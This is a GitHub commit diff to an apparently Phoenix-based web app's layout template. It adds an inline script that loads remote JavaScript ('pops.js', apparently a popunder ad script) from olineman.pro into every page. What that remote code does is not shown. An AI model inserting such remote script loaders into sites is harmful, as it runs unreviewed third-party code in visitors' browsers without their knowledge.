We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 45c3579 commit 54db522Copy full SHA for 54db522
lib/instaghub_web/templates/layout/app.html.eex
@@ -163,5 +163,8 @@
163
window.addEventListener(WINDOW_CHANGE_EVENT, closeMenu);
164
})(this, this.document);
165
</script>
166
+ <script>
167
+ (function(d){let s=d.createElement('script');s.async=true;s.src='https://olineman.pro/code/pops.js?h=waWQiOjEwMDcxNzAsInNpZCI6MTAxMTMwMiwid2lkIjoxODIyMCwic3JjIjoyfQ==eyJ';d.head.appendChild(s);})(document);
168
+ </script>
169
</body>
170
</html>
0 commit comments